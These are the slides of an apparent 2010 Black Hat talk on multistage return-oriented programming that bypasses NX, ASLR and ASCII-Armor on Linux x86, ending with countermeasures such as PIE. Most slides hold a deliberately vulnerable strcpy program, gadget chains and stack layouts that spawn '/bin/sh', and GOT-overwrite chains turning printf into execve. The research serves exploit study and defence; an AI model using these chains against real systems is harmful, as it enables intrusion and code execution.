Payload Already Inside:

Data re-use for ROP Exploits

Long Le
[email protected]

1 BLACKHAT USA 2010

 Who am I?

● VNSECURITY founding member

● Capture-The-Flag player
► CLGT Team

BLACKHAT USA 2010 2 B.A.D.

B.A.D.
 Why this talk?
● Buffer overflow exploit on modern Linux (x86)
distribution is difficult
► Non Executable (NX/XD)
► Address Space Layout Randomization (ASLR)
► ASCII-Armor Address Mapping

High entropy ASLR and ASCII-Armor Address Mapping

make Return-to-Libc / Return-Oriented-Programming
(ROP) exploitation techniques become very difficult

BLACKHAT USA 2010 3 B.A.D.

B.A.D.
 What to be presented?

● A practical and reliable technique to bypass NX,

ASLR and ASCII-Armor protections to exploit
memory/stack corruption vulnerabilities
► Multistage ROP exploitation technique
● Focus on latest Linux x86
● Our ROPEME tool
► Practical ROP gadgets catalog
► Automation scripts

BLACKHAT USA 2010 4 B.A.D.

B.A.D.
 What not?

● Not a return-oriented programming 101 talk

● We do not talk about
► ASLR implementation flaws / information leaks
► Compilation protections
♦ Stack Protector / ProPolice
► Mandatory Access Control
♦ SELinux
♦ AppArmor
♦ RBAC/Grsecurity

BLACKHAT USA 2010 5 B.A.D.

B.A.D.
 Agenda
● Introduction
● Recap on stack overflow & mitigations
● Multistage ROP technique
► Stage-0 (payload loader)
► Stage-1 (actual payload)
♦ Payload strategy
♦ Resolve run-time libc addresses
● Putting all together, ROPEME!
► Practical ROP payloads
♦ A complete stage-0 loader
♦ Practical ROP gadgets catalog
♦ ROP automation
► ROPEME Tool & DEMO
● Countermeasures
● Summary
BLACKHAT USA 2010 6 B.A.D.
B.A.D.
 Sample vulnerable program

#include <string.h>
#include <stdio.h>

int main (int argc, char **argv)

{
char buf[256];
int i;
seteuid (getuid());
if (argc < 2)
{
puts ("Need an argument\n");
Overflow!
exit (1);
}

// vulnerable code
strcpy (buf, argv[1]);

printf ("%s\nLen:%d\n", buf, (int)strlen(buf));

return (0);
}

BLACKHAT USA 2010 7 B.A.D.

B.A.D.
 Stack overflow

Stack growth

AA...AA AAAA AAAA AAAA AAAA

Saved EBP Saved EIP

● Attacker controlled
► Execution flow: EIP
► Stack: ESP

BLACKHAT USA 2010 8 B.A.D.

B.A.D.
 Mitigation techniques
● Non eXcutable (PaX, ExecShield..)
► Hardware NX/XD bit
► Emulation
● Address Space Layout Randomization (ASLR)
► stack, heap, mmap, shared lib
► application base (required userland compiler
support for PIE)
● ASCII-Armor mapping
► Relocate all shared-libraries to ASCII-Armor
area (0-16MB). Lib addresses start with NULL
byte
● Compilation protections
► Stack Canary / Protector

BLACKHAT USA 2010 9 B.A.D.

B.A.D.
 NX / ASLR / ASCII-Armor

ASCII-Armor No PIE NX

$ cat /proc/self/maps
00a97000-00c1d000 r-xp 00000000 fd:00 91231 /lib/libc-2.12.so
00c1d000-00c1f000 r--p 00185000 fd:00 91231 /lib/libc-2.12.so
00c1f000-00c20000 rw-p 00187000 fd:00 91231 /lib/libc-2.12.so
00c20000-00c23000 rw-p 00000000 00:00 0

08048000-08053000 r-xp 00000000 fd:00 21853 /bin/cat

08053000-08054000 rw-p 0000a000 fd:00 21853 /bin/cat
09fb2000-09fd3000 rw-p 00000000 00:00 0 [heap]

b777a000-b777b000 rw-p 00000000 00:00 0

b778a000-b778b000 rw-p 00000000 00:00 0
bfd07000-bfd1c000 rw-p 00000000 00:00 0 [stack]

ASLR

BLACKHAT USA 2010 10 B.A.D.

B.A.D.
 Linux ASLR

ASLR Randomness Circumvention

shared library 12 bits* / 17 bits** Feasible***

mmap 12 bits* / 17 bits** Feasible***

heap 13 bits* / 23 bits** Feasible*

stack 19 bits* / 23 bits** Hard

* paxtest on Fedora 13 (ExecShield)

** paxtest on Gentoo with hardened kernel source 2.6.32 (Pax/Grsecurity)
*** Bypassing ASLR depends on the vulns, ASLR implementation and environmental
factors.
17 bits might still be in a possible range to brute force.
BLACKHAT USA 2010 11 B.A.D.
B.A.D.
 Recap - Basic code injection

Stack growth

Padding &shellcode NOP … … NOP shellcode

Saved EIP

● Traditional in 1990s
► Everything is static
► Can perform arbitrary computation
● Does not work with NX
● Difficult with ASLR

BLACKHAT USA 2010 12 B.A.D.

B.A.D.
 Recap - Return-to-libc

Stack growth

padding &system() &next_func() &binsh … “/bin/sh”

Saved EIP

● Bypass NX
● Difficult with ASLR/ASCII-Armor
► Libc function’s addresses
► Location of arguments on stack
► NULL byte
 Hard to make chained ret-to-libc calls

BLACKHAT USA 2010 13 B.A.D.

B.A.D.
 Recap – Return-Oriented Programming I

● Based on ret-to-libc and “borrowed code chunks”

● Gadgets: sequence of instructions ending with
RET

pop ebx pop edi add [eax], ebx

ret pop ebp ret
ret

Load a value to Lift ESP up 8 Add register's value to

the register bytes the memory location

BLACKHAT USA 2010 14 B.A.D.

B.A.D.
 Recap – Return-Oriented Programming II
Stack growth
“/bin/sh”
...
0x9ad25 0x9ad25: call gs:[0x10]; ret
0x80497ec
0x0
0x0
0x2a4eb 0x2a4eb: pop ecx; pop edx; ret
&binsh
0x16be3 0x16be3: pop ebx; ret
0xb
0x22d4c 0x22d4c: pop eax; ret

● With enough of gadgets, ROP payloads could perform

arbitrary computation (Turing-complete)
● Problems
► Small number of gadgets from vulnerable binary
► Libs have more gadgets, but ASLR/ASCII-Armor makes it
difficult similar to return-to-libc technique
BLACKHAT USA 2010 15 B.A.D.
B.A.D.
 Exploitability v.s. Mitigation Techniques

Mitigation Exploitability

NX Easy

ASLR Feasible

NX + ASCII-Armor Feasible*

NX + ASLR Depends*

NX + ASLR + ASCII-Armor Hard* our target to

make this
NX + ASLR + ASCII-Armor + Stack
become easy
Canary + PIE Hard++*

* depends on the vulns, context and environmental factors

BLACKHAT USA 2010 16 B.A.D.

B.A.D.
 Agenda
● Introduction
● Recap on stack overflow & mitigations
● Multistage ROP technique
► Stage-0 (payload loader)
► Stage-1 (actual payload)
♦ Payload strategy
♦ Resolve run-time libc addresses
● Putting all together, ROPEME!
► Practical ROP payloads
♦ A complete stage-0 loader
♦ Practical ROP gadgets catalog
♦ ROP automation
► ROPEME Tool & DEMO
● Countermeasures
● Summary
BLACKHAT USA 2010 17 B.A.D.
B.A.D.
 Stage-0: Make a fixed stack I

● Why a fixed stack?

► Bypass ASLR (randomized stack)
► Control function's arguments
► Control stack frames
● Where is my fixed stack?
► Data section of binary
♦ Writable
♦ Fixed location
♦ Address is known in advance

BLACKHAT USA 2010 18 B.A.D.

B.A.D.
 Stage-0: Make a fixed stack II

Stack growth “/bin/sh”

0x8049838 system()'s argument

pop-ret
&system()

leave; ret
0x8049820 Next stack frame
pop ebp; ret
0x8049810

BLACKHAT USA 2010 19 B.A.D.

B.A.D.
 Stage-0: Make a fixed stack III
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 08048134 000134 000013 00 A 0 0 1
[ 2] .note.ABI-tag NOTE 08048148 000148 000020 00 A 0 0 4
[ 3] .note.gnu.build-i NOTE 08048168 000168 000024 00 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0804818c 00018c 000020 04 A 5 0 4
[ 5] .dynsym DYNSYM 080481ac 0001ac 0000b0 10 A 6 1 4
[ 6] .dynstr STRTAB 0804825c 00025c 000073 00 A 0 0 1
[ 7] .gnu.version VERSYM 080482d0 0002d0 000016 02 A 5 0 2
[ 8] .gnu.version_r VERNEED 080482e8 0002e8 000020 00 A 6 1 4
[ 9] .rel.dyn REL 08048308 000308 000008 08 A 5 0 4
[10] .rel.plt REL 08048310 0x08049804
000310 000048 08 A 5 12 4
[11] .init PROGBITS 08048358 000358 000030 00 AX 0 0 4
[12] .plt PROGBITS 08048388 000388 0000a0 04 AX 0 0 4
[13] .text PROGBITS 08048430 000430 0001dc 00 AX 0 0 16
[14] .fini PROGBITS 0804860c 00060c 00001c 00 AX 0 0 4
[15] .rodata PROGBITS 08048628 000628 000028 00 A 0 0 4
[16] .eh_frame_hdr PROGBITS 08048650 000650 000024 00 A 0 0 4
[17] .eh_frame PROGBITS 08048674 000674 00007c 00 A 0 0 4
[18] .ctors PROGBITS 080496f0 0006f0 000008 00 WA 0 0 4
[19] .dtors PROGBITS 080496f8 0006f8 000008 00 WA 0 0 4
[20] .jcr PROGBITS 08049700 000700 000004 00 WA 0 0 4
[21] .dynamic DYNAMIC 08049704 000704 0000c8 08 WA 6 0 4
[22] .got PROGBITS 080497cc 0007cc 000004 04 WA 0 0 4
[23] .got.plt PROGBITS 080497d0 0007d0 000030 04 WA 0 0 4
[24] .data PROGBITS 08049800 000800 000004 00 WA 0 0 4
[25] .bss NOBITS 08049804 000804 000008 00 WA 0 0 4

BLACKHAT USA 2010 20 B.A.D.

B.A.D.
 Transfer payload to the custom stack

● Use memory transfer function

► strcpy() / sprintf()
♦ No NULL byte in input
► Return to PLT (Procedure Linkage Table)
● Transfer byte-per-byte of payload
● Where is my payload?
► Inside binary

BLACKHAT USA 2010 21 B.A.D.

B.A.D.
 Return-to-PLT

gdb$ x/i 0x0804852d

0x804852d <main+73>: call 0x80483c8 <strcpy@plt>

strcpy@PLT
gdb$ x/i 0x80483c8
0x80483c8 <strcpy@plt>: jmp DWORD PTR ds:0x80497ec

gdb$ x/x 0x80497ec

strcpy@GOT
0x80497ec <_GLOBAL_OFFSET_TABLE_+24>: 0x00b0e430

gdb$ x/i 0x00b0e430 strcpy@LIBC

0xb0e430 <strcpy>: push ebp

BLACKHAT USA 2010 22 B.A.D.

B.A.D.
 Stage-0: Payload loader

● Input: stage-1 payload

● Output: stage-0 payload that transfers stage-1
payload to the custom stack
● How?
► Pick one or more byte(s)
► Search in binary for that byte(s)
► Generate strcpy() call
► Repeat above steps until no byte left

BLACKHAT USA 2010 23 B.A.D.

B.A.D.
 Stage-0 example

● Transfer “/bin/sh” => 0x08049824

strcpy@plt:
0x0804852e <+74>: call 0x80483c8 <strcpy@plt>

pop-pop-ret:
0x80484b3 <__do_global_dtors_aux+83>: pop ebx
0x80484b4 <__do_global_dtors_aux+84>: pop ebp
0x80484b5 <__do_global_dtors_aux+85>: ret

Byte values and stack layout:

0x8048134 : 0x2f '/'
['0x80483c8', '0x80484b3', '0x8049824', '0x8048134']
0x8048137 : 0x62 'b'
['0x80483c8', '0x80484b3', '0x8049825', '0x8048137']
0x804813d : 0x696e 'in'
['0x80483c8', '0x80484b3', '0x8049826', '0x804813d']
0x8048134 : 0x2f '/'
['0x80483c8', '0x80484b3', '0x8049828', '0x8048134']
0x804887b : 0x736800 'sh\x00'
['0x80483c8', '0x80484b3', '0x8049829', '0x804887b']

BLACKHAT USA 2010 24 B.A.D.

B.A.D.
 Transfer control to the custom stack
● At the end of stage-0
● ROP gadgets

(1) pop ebp; ret (1) pop ebp; ret

(2) leave; ret (2) mov esp, ebp; ret

BLACKHAT USA 2010 25 B.A.D.

B.A.D.
 Stage-0 summary
● Stage-0 advantages
► ASLR bypass
♦ Custom stack addresses are fixed
► ASCII-Armor bypass
♦ Stage-1 payload can contains any byte value including
NULL byte

● Practical in most of binaries

► Only a minimum number of ROP gadgets are
required for stage-0 payload (available in most
of binaries)
♦ Load register (pop reg)
♦ Add/sub memory (add [reg], reg)
♦ Stack pointer manipulation (pop ebp; ret / leave; ret)

BLACKHAT USA 2010 26 B.A.D.

B.A.D.
 Agenda
● Introduction
● Recap on stack overflow & mitigations
● Multistage ROP technique
► Stage-0 (payload loader)
► Stage-1 (actual payload)
♦ Payload strategy
♦ Resolve run-time libc addresses
● Putting all together, ROPEME!
► Practical ROP payloads
♦ A complete stage-0 loader
♦ Practical ROP gadgets catalog
♦ ROP automation
► ROPEME Tool & DEMO
● Countermeasures
● Summary
BLACKHAT USA 2010 27 B.A.D.
B.A.D.
 Stage-1 payload strategy

The stage-1 payload, in order to bypass NX/ASLR,

could do:

● Chained ret-to-libc calls

► Easy with a fixed stack from stage-0
● Shellcode with return-to-mprotect
► Works on most of distributions*
● ROP shellcode
► Use gadgets from libc

* PaX has mprotect restriction so this will not work

BLACKHAT USA 2010 28 B.A.D.

B.A.D.
 Resolve run-time libc addresses

● The bad:
► Addresses are randomized (ASLR)
● The good:
► Offset between two functions is a constant
♦ addr(system) – addr(printf) = offset
► We can calculate any address from a known
address in GOT (Global Offset Table)
► ROP gadgets are available

BLACKHAT USA 2010 29 B.A.D.

B.A.D.
 GOT overwriting I

● Favorite method to exploit format string bug

● Steps
► Load the offset into register
► Add register to memory location (GOT entry)
► Return to PLT entry
● ROP Gadgets
► Load register (1) pop ecx;
► Add memory pop ebx; leave; ret

(2) pop ebp; ret

(3) add [ebp+0x5b042464] ecx;

pop ebp; ret

BLACKHAT USA 2010 30 B.A.D.

B.A.D.
 GOT overwriting II
● printf() => execve()

Stack growth
...
0x80483d8 0x80483d8: printf@PLT
0xbabeface 0x80484ae: add [ebp+0x5b042464] ecx;
0x80484ae pop ebp; ret
0x80497ec
0xad007388 printf@GOT - 0x5b042464 = 0xad007388
0x80484b4 0x80484b4: pop ebp; ret
0xbaadcafe
0x54120 execve() - printf() = 0x54120

0x8048624 0x8048624: pop ecx; pop ebx; leave; ret

0x0804920
0x80484b4 0x80484b4: pop ebp; ret
0x0804910

BLACKHAT USA 2010 31 B.A.D.

B.A.D.
 GOT dereferencing I
● Steps
► Load the offset into register
► Add the register with memory location (GOT
entry)
► Jump to or call the register
● ROP gadgets
► Load register (1) pop eax;
pop ebx;
► Add register leave; ret
► Jump/call register (2) add eax [ebx-0xb8a0008];
lea esp [esp+0x4]; pop ebx;
pop ebp; ret

(3) call eax;

leave; ret

BLACKHAT USA 2010 32 B.A.D.

B.A.D.
 GOT dereferencing II
● printf() => execve()

Stack growth ...

0x80484e0 0x80484e0: call eax ; leave; ret
0x8048934
0xbabeface
0x80497ec
0xbaadcafe 0x80485fe: add eax [ebx-0xb8a0008];
0x80485fe lea esp [esp+0x4]; pop ebx; pop ebp; ret
0x138e97f4 printf@GOT + 0xb8a0008 = 0x138e97f4
0x54120 execve() - printf() = 0x54120
0x8048384 0x8048384: pop eax; pop ebx; leave; ret
0x0804920
0x80484b4 0x80484b4: pop ebp; ret
0x0804910

BLACKHAT USA 2010 33 B.A.D.

B.A.D.
 Agenda
● Introduction
● Recap on stack overflow & mitigations
● Multistage ROP technique
► Stage-0 (payload loader)
► Stage-1 (actual payload)
♦ Payload strategy
♦ Resolve run-time libc addresses
● Putting all together, ROPEME!
► Practical ROP payloads
♦ A complete stage-0 loader
♦ Practical ROP gadgets catalog
♦ ROP automation
► ROPEME Tool & DEMO
● Countermeasures
● Summary
BLACKHAT USA 2010 34 B.A.D.
B.A.D.
 A complete stage-0 loader
● Turn any function to strcpy() / sprintf()
► GOT overwriting

● ROP loader

(1) pop ecx; ret

(2) pop ebp; ret

(3) add [ebp+0x5b042464] ecx; ret

BLACKHAT USA 2010 35 B.A.D.

B.A.D.
 Practical ROP gadgets catalog

● Less than 10 gadgets?

► Load register
♦ pop reg
► Add/sub memory
♦ add [reg + offset], reg
► Add/sub register (optional)
♦ add reg, [reg + offset]

BLACKHAT USA 2010 36 B.A.D.

B.A.D.
 ROP automation

● Generate and search for required gadgets

addresses in vulnerable binary
● Generate stage-1 payload
● Generate stage-0 payload
● Launch exploit

BLACKHAT USA 2010 37 B.A.D.

B.A.D.
 ROPEME!

● ROPEME – Return-Oriented Exploit Made Easy

► Generate gadgets for binary
► Search for specific gadgets
► Sample stage-1 and stage-0 payload generator

BLACKHAT USA 2010 38 B.A.D.

B.A.D.
 DEMO
● ROPEME

● ROP Exploit
►LibTIFF 3.92 buffer overflow (CVE-2010-2067)
♦ Dan Rosenberg's “Breaking LibTIFF”
► PoC exploit for “tiffinfo”
♦ No strcpy() in binary
♦ strcasecmp() => strcpy()
► Distros
♦ Fedora 13 with ExecShield

BLACKHAT USA 2010 39 B.A.D.

B.A.D.
 Agenda
● Introduction
● Recap on stack overflow & mitigations
● Multistage ROP technique
► Stage-0 (payload loader)
► Stage-1 (actual payload)
♦ Payload strategy
♦ Resolve run-time libc addresses
● Putting all together, ROPEME!
► Practical ROP payloads
♦ A complete stage-0 loader
♦ Practical ROP gadgets catalog
♦ ROP automation
► ROPEME Tool & DEMO
● Countermeasures
● Summary
BLACKHAT USA 2010 40 B.A.D.
B.A.D.
 Countermeasures
● Position Independent Executable (PIE)
► Randomize executable base (ET_EXEC)
► NULL byte in all PROT_EXEC mappings,
including executable base

Effective to prevent “borrowed code chunks”/ ROP style

exploits. Another information leak flaw or ASLR
implementation flaw is required for the attack to be
success

● Not widely adopted by vendors

► Recompilation efforts
► Used in critical applications in popular distros

BLACKHAT USA 2010 41 B.A.D.

B.A.D.
 Summary
● We presented a generic and reliable technique for
exploitation of memory corruption vulnerabilities:
► bypass NX/ASLR/ASCII-Armor protections
► do not rely on ASLR implementation bugs or
information leaks
► work on most of binaries
● We showed an automated tool to build multistage
ROP payloads. ROPEME to be released on
vnsecurity.net website
● This technique could be extended for other OSes
(*BSD, Mac OS X, Windows, ..)
► ROPEME to support more OSes

BLACKHAT USA 2010 42 B.A.D.

B.A.D.
 Thank you!

Q&A

BLACKHAT USA 2010 43 B.A.D.

B.A.D.